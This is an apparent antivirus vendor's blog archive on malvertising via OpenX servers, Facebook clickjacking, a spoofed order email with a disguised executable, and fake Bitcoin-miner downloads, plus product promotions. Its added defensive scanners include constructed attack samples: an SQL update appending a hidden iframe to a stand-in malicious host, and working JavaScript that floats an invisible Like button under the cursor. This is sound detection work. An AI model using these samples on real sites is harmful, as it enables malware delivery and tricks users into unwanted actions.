
Posts Tagged ‘malware’
November 14th, 2013

Malvertising and OpenX servers

Malvertising is an abbreviation of malicious advertising: legitimate sites spread malware through their compromised advertisement systems. There have been many malvertising campaigns in the last few years, some of them confirmed even on big sites like The New York Times, but most go unnoticed because they are well hidden and served only to selected users. Earlier this year, one of our top analysts found a stealth infection on a Czech entertainment site and began to watch it. We were able to obtain source code from the infected sites, and I would like to show you how easily such a compromise is carried out and what can be done to secure your server.

In this case all infected servers ran OpenX (an open source advertisement server), which has a rich history of vulnerabilities. Look, for example, at the last three versions.

  • Version 2.8.9 and earlier contained a SQL injection vulnerability
  • Version 2.8.10 shipped with a hidden backdoor that allowed remote PHP code execution
  • The latest version, 2.8.11, is more secure, but it still has known vulnerabilities

In summer 2013, OpenX was re-branded as Revive Adserver and several security flaws were patched. I strongly recommend updating to the latest version (currently 3.0.0) to keep your advertisement server from being misused by attackers.

How do they get in?

An analysis of the infected web pages revealed that the attacker used SQL injection to obtain administrator logins and passwords from the database. He then used those credentials to log in and exploited another flaw to upload a backdoor with an executable extension. In fact there were several backdoors and PHP scripts hidden in various places, suggesting that this server had been attacked multiple times.

[Image: listing of the scripts found on the infected server, with their creation dates]

This picture shows all the scripts found on the infected server and their creation dates. The first three files are backdoors and tools for controlling the server. The last two are different; they serve as an interface to the database.

The files “inj” and “minify” appear to be two versions of the same script, which connects to the database and either removes the injected code or adds it. The result of this modification is an iframe appended to the advertisement banners. The picture below shows the SQL query used to insert the malicious JavaScript.

[Image: the SQL query that appends the malicious iframe to the banner HTML]

The described infection is really hard to trace, because it is not present on the server all the time, but only at predefined times, and it is shown only to users coming from a specific region.
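The audit a server owner can run against the ad-server database, as an added example that is not from the original post and not OpenX or Revive Adserver code: it builds an in-memory SQLite copy of a banners table (the table and column names `banners`, `bannerid`, `htmltemplate`, the allow-listed hosts and the payload URL `evil.example` are assumptions standing in for the real schema and the real campaign), reproduces on a constructed sample row the kind of UPDATE the “inj” script performs, and then lists every banner whose markup loads an iframe or script from a host that is not on the allow-list.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Hosts allowed to appear as iframe/script sources in banner markup
# (assumption: your ad server and the advertisers you actually serve).
ALLOWED_HOSTS = {"ads.example.net", "cdn.advertiser.example"}

# <iframe ... src=...> or <script ... src=...>: what gets appended to
# otherwise legitimate banner HTML to pull a payload from elsewhere.
TAG_RE = re.compile(r"<(iframe|script)\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def foreign_sources(html, allowed=ALLOWED_HOSTS):
    """Return (tag, src) pairs whose host is not on the allow-list.

    A relative src (no host) is reported too: an attacker who already has a
    backdoor on the ad server can point the iframe at it.
    """
    hits = []
    for tag, src in TAG_RE.findall(html):
        host = urlparse(src).hostname or ""
        if host not in allowed:
            hits.append((tag.lower(), src))
    return hits


def audit(conn, allowed=ALLOWED_HOSTS):
    """Map bannerid -> offending (tag, src) pairs for every tampered banner.

    Runs against the stored markup, not against served pages: the injected
    code is delivered only at chosen times and to chosen regions, so fetching
    the site from your own desk proves nothing.
    """
    rows = conn.execute("SELECT bannerid, htmltemplate FROM banners").fetchall()
    findings = {}
    for banner_id, html in rows:
        bad = foreign_sources(html or "", allowed)
        if bad:
            findings[banner_id] = bad
    return findings


def sample_db():
    """Constructed sample database: one clean banner, one tampered banner."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE banners (bannerid INTEGER PRIMARY KEY, description TEXT, htmltemplate TEXT)"
    )
    clean = ('<a href="https://cdn.advertiser.example/landing">'
             '<img src="https://cdn.advertiser.example/b1.png" alt=""></a>')
    conn.execute("INSERT INTO banners VALUES (1, 'clean', ?)", (clean,))
    conn.execute("INSERT INTO banners VALUES (2, 'tampered', ?)", (clean,))
    # The shape of modification the post describes: an iframe appended to the
    # existing banner HTML by an UPDATE on the banners table. The payload URL
    # is invented for this example.
    conn.execute(
        "UPDATE banners SET htmltemplate = htmltemplate || ? WHERE bannerid = 2",
        ('<iframe src="http://evil.example/c.php" width="1" height="1" '
         'frameborder="0" style="opacity:0"></iframe>',),
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    for banner_id, bad in audit(sample_db()).items():
        for tag, src in bad:
            print(f"banner {banner_id}: foreign <{tag}> src={src}")
```

Point `audit` at a connection to the real database (with the column names adjusted) and run it from cron; a banner that suddenly loads a third-party iframe is the indicator, not anything you can see in a browser, because the attacker gates delivery by time and by visitor region.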

October 28th, 2013

Facebook Clickjacking: Will You Like Me?

“Who wouldn’t want to have more likes on their Facebook page?” This is the motivation behind a very simple piece of code to get more likes, but while other methods usually consist of adding better content or advertising, this one is a bit easier, and much dirtier. Why not show the Like button directly beneath the visitor’s mouse cursor as they browse a website, make it invisible, and move it as the mouse moves?

The only thing the victim has to do is click; if they are logged in to Facebook, they will automatically like the Facebook page. And of course, it is not only about the number of likes: each like means the victim will get everything this page posts in their news feed (until they unlike the page), and all their friends will also see that they like it, so why wouldn’t they check it out themselves?

This method is possible thanks to the Like Button, a social plugin made by Facebook developers. It is used legitimately on many sites, but when combined with CSS hiding and JavaScript repositioning, the victim has no chance of noticing it. If you want to know how to minimize the impact of such tactics, or if you are more into the technical details, read on.
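A page scanner for the pattern just described, as an added example that is not from the original post: it parses a page's HTML, collects iframes that embed the Facebook Like plugin, and reports when one of them is made invisible with `opacity` (a `visibility:hidden` element would not receive the click, so a clickjacker cannot use it), taken out of normal flow with absolute or fixed positioning, and accompanied by a mousemove handler. The indicator thresholds and the two sample pages are constructed for this example; the attack page reproduces only what the post describes.

```python
import re
from html.parser import HTMLParser

LIKE_SRC_RE = re.compile(r"facebook\.com/plugins/like", re.I)
# opacity:0 or a fraction below 1; the alpha() filter is the legacy IE spelling
OPACITY_RE = re.compile(r"opacity\s*:\s*(0?\.\d+|0)\b", re.I)
IE_FILTER_RE = re.compile(r"alpha\(\s*opacity\s*=\s*0\s*\)", re.I)
POSITION_RE = re.compile(r"position\s*:\s*(absolute|fixed)", re.I)
MOUSEMOVE_RE = re.compile(r"mousemove", re.I)


def is_hidden(style):
    """True if an element with this inline style is effectively invisible."""
    m = OPACITY_RE.search(style)
    if m and float(m.group(1)) < 0.1:
        return True
    return bool(IE_FILTER_RE.search(style))


class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.like_styles = []      # inline styles of framed Like buttons
        self.tracks_mouse = False  # the page registers a mousemove handler
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and LIKE_SRC_RE.search(a.get("src") or ""):
            self.like_styles.append(a.get("style") or "")
        elif tag == "script":
            self._in_script = True
        if "onmousemove" in a:
            self.tracks_mouse = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and MOUSEMOVE_RE.search(data):
            self.tracks_mouse = True


def clickjack_report(html):
    """Summarise the Like-button clickjacking indicators found in a page."""
    s = _Scanner()
    s.feed(html)
    s.close()
    hidden = [st for st in s.like_styles if is_hidden(st)]
    floating = [st for st in hidden if POSITION_RE.search(st)]
    return {
        "like_frames": len(s.like_styles),
        "hidden_like_frames": len(hidden),
        "floating_like_frames": len(floating),
        "tracks_mouse": s.tracks_mouse,
        # an invisible, freely positioned Like button plus a mouse tracker
        # is the combination the post describes
        "suspicious": bool(floating) and s.tracks_mouse,
    }


# Constructed sample of the technique: invisible Like frame following the cursor.
SAMPLE_ATTACK = """<html><body>
<h1>Funny pictures</h1>
<iframe id="like" src="https://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fexample.com%2Fpage"
        style="position:absolute; opacity:0; width:50px; height:20px; border:0"></iframe>
<script>
document.addEventListener('mousemove', function (e) {
  var f = document.getElementById('like');
  f.style.left = (e.pageX - 10) + 'px';
  f.style.top = (e.pageY - 5) + 'px';
});
</script>
</body></html>"""

# Constructed sample of legitimate use: a visible Like button in normal flow.
SAMPLE_LEGIT = """<div class="share">
<iframe src="https://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fexample.com%2F"
        style="border:none; width:90px; height:20px"></iframe>
</div>"""

if __name__ == "__main__":
    print("attack page:", clickjack_report(SAMPLE_ATTACK))
    print("legit page: ", clickjack_report(SAMPLE_LEGIT))
```

The scanner only sees inline styles and inline scripts; a page that hides the frame from an external stylesheet or moves it from an external script needs the same checks applied to those fetched resources as well.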


October 16th, 2013

Fake email spoofs AVAST

Malware samples received in the avast! Virus Lab on Wednesday show that a spoofed email which looks as if it was sent by AVAST is spreading widely. Fortunately, AVAST detects this malware as Win32:Malware[Gen] and has been blocking it since 12:45 pm yesterday.

The email’s subject line says, “Your Order details and Additional information,” and the message body contains the standard text that is sent when a person purchases a license from AVAST. The message includes an order number that is not authenticated and does not exist in the AVAST database.

The sender’s address is noreply@avast.com. This is a forged sender address; it was not created by AVAST. The email contains an attachment titled avast-Antivirus-Order-Details.zip. Inside is a file with a double extension, *.PDF.EXE, which is the malware: an executable disguised as a PDF document, relying on Windows hiding the final extension.

Our worldwide CommunityIQ sensors automatically detected these suspicious files and forwarded them to the avast! Virus Lab, where the new threat was analyzed and neutralized immediately. So far, our virus lab has received 12,500 samples of this malware.
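A mail-gateway style check for the attachment trick described above, as an added example that is not from the original post: it flags names that end in an executable extension hidden behind a document extension (`Order.PDF.EXE`, case-insensitively and with spaces inserted before the real extension), looks inside a zip attachment to apply the same check to its members, and additionally catches a file whose name says document but whose bytes begin with the `MZ` header of a Windows executable. The extension lists are an assumption about a typical gateway policy; the zip is built in memory and, apart from the attachment name the post quotes, its contents are constructed stubs, not real malware.

```python
import io
import zipfile

# Extensions Windows runs on double-click (assumption: a typical gateway list).
EXECUTABLE = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
              ".vbs", ".vbe", ".wsf", ".hta", ".msi", ".lnk"}
# Extensions a recipient reads as a harmless document or picture.
DOCUMENT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt",
            ".jpg", ".jpeg", ".png", ".gif", ".htm", ".html"}


def classify(name):
    """Explain why a file name looks disguised, or return None.

    Catches the double extension the post describes (Order.PDF.EXE), case-
    insensitively and with spaces inserted before the real extension, and a
    plain executable attachment, which no legitimate order mail contains.
    """
    parts = name.strip().lower().replace(" ", "").split(".")
    if len(parts) < 2:
        return None
    last = "." + parts[-1]
    if last not in EXECUTABLE:
        return None
    if len(parts) >= 3 and "." + parts[-2] in DOCUMENT:
        return f"document extension .{parts[-2]} hides executable {last}"
    return f"executable attachment {last}"


def pe_under_document(name, data):
    """Flag a file whose name says document but whose bytes start a PE image."""
    if "." not in name:
        return None
    ext = "." + name.lower().rsplit(".", 1)[-1]
    if ext in DOCUMENT and data[:2] == b"MZ":
        return f"PE header (MZ) under document extension {ext}"
    return None


def scan_attachment(filename, data):
    """Return [(name, reason)] for the attachment, looking inside a zip."""
    if filename.lower().endswith(".zip") and zipfile.is_zipfile(io.BytesIO(data)):
        hits = []
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                if info.is_dir():
                    continue
                reason = classify(info.filename) or pe_under_document(
                    info.filename, archive.read(info))
                if reason:
                    hits.append((info.filename, reason))
        return hits
    reason = classify(filename) or pe_under_document(filename, data)
    return [(filename, reason)] if reason else []


def build_sample_zip():
    """Constructed stand-in for the attachment the post describes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        # the double-extension payload: a PE header stub, not real malware
        archive.writestr("avast-Antivirus-Order-Details.PDF.EXE", b"MZ" + b"\x00" * 62)
        archive.writestr("readme.txt", b"constructed benign text file\n")
        # a second trick: executable bytes under a document extension
        archive.writestr("Order.pdf", b"MZ" + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in scan_attachment("avast-Antivirus-Order-Details.zip",
                                        build_sample_zip()):
        print(f"{name}: {reason}")
```

The name check is cheap and catches this campaign; the content check is what catches the next one, when the sender drops the double extension and relies on the recipient opening whatever arrives.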

Avoid this attack by downloading the new avast! Antivirus 2014 for free.

October 8th, 2013

avast! Free Antivirus for Mac gets first place for malware detection

avast! Free Antivirus for Mac was pitted against 35 other antivirus products designed for Mac OS, including plenty of pricey solutions, and came out in first place for detection of malware.

Compared to Windows users, Mac users have been relatively free from malware attacks. But cybercrooks are just as aware as antivirus vendors of users’ false sense of security and their habit of browsing the internet without security software. You only have to read this blog to learn that cybercrooks are adapting Windows malware for use on Macs.

AVAST aces malware detection test

Over 300 malware samples and 35 applications were used to measure the effectiveness of products built specifically for Mac in a recent SecuritySpread.com test. Multiple machines running different operating system versions were used to ensure the reliability of the test, and for real-world results, Macs that are used every day for a range of tasks, from web development, media center and movie editing to gaming, were included. avast! Free Antivirus for Mac had the highest detection rate of them all. The results can be found here.

The Security Spread test was done with avast! Free Antivirus for Mac 7, but in preparation for the official public release of Mac OS X 10.9, aka Mavericks, avast! Free Antivirus for Mac 8.0 has been released. The changes are mostly under the hood, and it requires version 10.6.8 or newer. Download it here.

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun and contest information, please follow us on Facebook, Twitter and Google+.

September 20th, 2013

Avast! Free Antivirus passes new Antivirus Test with flying colors

AVAST is trusted by nearly 200 million people worldwide, and the trifecta of protection, performance, and usability works together to make it the most recommended antivirus protection in the world. If you don’t trust the experiences of 200 million people, how about research from an independent testing lab?

During July and August, when the rest of us were taking vacations at the beach, the German lab AV-TEST was busily testing 26 home-user security products. They focused on realistic test scenarios and challenged the products against real-world threats: detecting brand-new malware, email threats, downloading software, and installing and running programs.

“Avast, once again, has an impressive performance in our tests,” said Andreas Marx, CEO of AV-TEST. Our Facebook fans agree.


Avast! Free Antivirus was pitted against mostly paid-for products and earned the coveted “AV-TEST CERTIFIED” seal for its performance. AVAST scored perfectly in protecting home users from zero-day malware attacks, and identified and blocked all the malware samples AV-TEST threw at it.

“The free edition of Avast has shown stellar performance,” said Marx, “The offered protection was a lot better than many commercial anti-malware products. Avast is one of the top products when it comes to malware detection and blocking of known and unknown threats.”

September 11th, 2013

avast! Mobile Security trusted by millions to fight Android malware


There have been over 50 million downloads of avast! Mobile Security from Google Play since it was released last year. Android users are becoming more aware of the security and theft issues surrounding their mobile devices and are putting their trust in AVAST. A few weeks ago, avast! Mobile Premium was introduced, providing superior backup and anti-theft technology.

Android is the world’s most widely used mobile operating system (OS). That popularity, together with its open source architecture, makes it a primary target for malware. Android threats make up 79 percent of all known mobile malware, so mobile security should no longer be considered optional.

The avast! Mobile Security virus scanner detected 99% of malware with no false positives in a recent test by the independent lab AV-Comparatives. That exemplary detection, plus the fact that avast! Mobile Security has negligible impact on your smartphone’s performance or battery life, is why we have had 50 million downloads.


How to download avast! Mobile Security

Download avast! Mobile Security from the Google Play store as the free version, or upgrade to avast! Mobile Premium for access to all premium features. avast! Mobile Premium is available for $1.99 per month or $14.99 per year. Download and install it on your Android device now.

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun, and contest information, please follow us on Facebook, Twitter, Google+ and Instagram.

August 20th, 2013

No problem bro – ransom decryption service

If thieves gain control of sensitive personally identifiable information (PII) on your computer, your identity can be stolen. Data such as your social security number, driver’s license number, date of birth, or full name should be stored encrypted. Confidential business data like individual customer records or intellectual property should also be encrypted.

In this blog post we will look at a service offering file decryption. This service helps you decrypt files which were previously encrypted. But this is no helpful ‘Tips and Tricks’ post for people who forgot the password to their documents and want help recovering it. Although breaking weak passwords is quite possible, noproblembro.com specializes in a different type of service.



August 1st, 2013

Malicious Bitcoin Miners target Czech Republic

Today we are going to talk to those of you who use the Bitcoin digital currency to pay for a variety of goods and services, along with a warning about yet another source of Bitcoin miners: file sharing services. You may think that if you avoid cracks and keygens while browsing the web you will be safe. Well, we would recommend that you reconsider that position. Recently we found that someone had uploaded a lot of fake files containing Bitcoin miners to the uloz.to file sharing service!

Bitcoin Mining service

First a little background for the uninitiated: Bitcoins can be obtained by trading real currency, goods, or services with people who have them, or alternatively through mining. The mining process involves running software that solves computationally hard problems, for which you are rewarded with a share of the newly created coins. There is a finite number of Bitcoins to be had, and mining for them can be compared to extracting gold or diamonds from the earth: the more that have been mined, the fewer remain, so it becomes increasingly harder and more expensive. Here’s a descriptive article about mining.

Bitcoin mining pools such as bitminter.com combine the computing resources of their users to mine new Bitcoins. In order to participate, miners create an account and then register their computers (workers) with the service. Then they simply run the Bitcoin miner program with their credentials on as many computers as they have. In the end, given enough computing power and time, they might end up with a few Bitcoins.

It can be expected that some people will not be satisfied with using only their own machines, so they will try to use the computing power of unsuspecting victims. And that’s exactly what the authors of this malware are doing: they use hardware that does not belong to them to generate money.

It’s not a Bitcoin problem; it’s a people problem

We must stress that there’s nothing wrong with Bitcoin or its mining services. The problem is that some greedy people are misusing them.

Some of them can be seen in the following image. The word “cestina” (čeština) means that the file should contain the Czech localization of the referenced program. All of them contain a hidden feature, and sometimes the name is a complete fabrication. For example, The-Night-of-the-Rabbit-cestina.exe contains a crack for Call of Duty 4. Notice too that all these files have an elevated popularity, no doubt a result of tampering. Some downloaders already suspect something fishy about these files.

[Image: the malicious files on Uloz.to, and a warning comment left on the sharing server]


July 11th, 2013

avast! Mobile Security gets Editors’ Choice Award from PC Magazine

PC Magazine awarded avast! Mobile Security the Editors’ Choice Award for free Android security apps thanks to its “huge array of powerful tools and fine-grained controls.”

A major concern for smartphone owners is the increasing threat of malicious software targeting the Android OS. Max Eddy, software analyst for PC Magazine, writes that, “avast! is well-positioned to guard against new threats that use novel attack vectors we’ve yet to imagine.”

Running quietly in the background, with no system slow-down or stuttering, “avast! will also keep an ever-vigilant eye on your device, warning you as soon as it detects something it doesn’t like,” he writes in his June 2013 review.

But these days, it’s more likely that you will fall victim to theft and loss instead of malware. Eddy explains, “In this department, avast! has an impressive slate of features and controls.”

In case your phone walks off somewhere, you can use the my.avast web portal where you can remotely locate, lock, or wipe your device, and set off the alarm. Eddy said, “I was particularly impressed that the alarm was not only loud, at 96 dB, but also highly illustrative. ‘This phone has been lost or stolen,’ said my S III, cycling between that phrase and what sounded like a Star Trek warning klaxon.”

Make sure you install avast! Mobile Security, the Editors’ Choice for free Android security suites, on your smartphone and tablet. It is available for free in the Google Play store.

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun, and contest information, please follow us on Facebook, Twitter, Google+ and Instagram.

July 3rd, 2013

Fake Flash Player installer spreads via Twitter and Facebook

Recently we identified a threat which uses Twitter and Facebook to spread. The origin of the infection begins by clicking malicious tweets or Facebook posts.
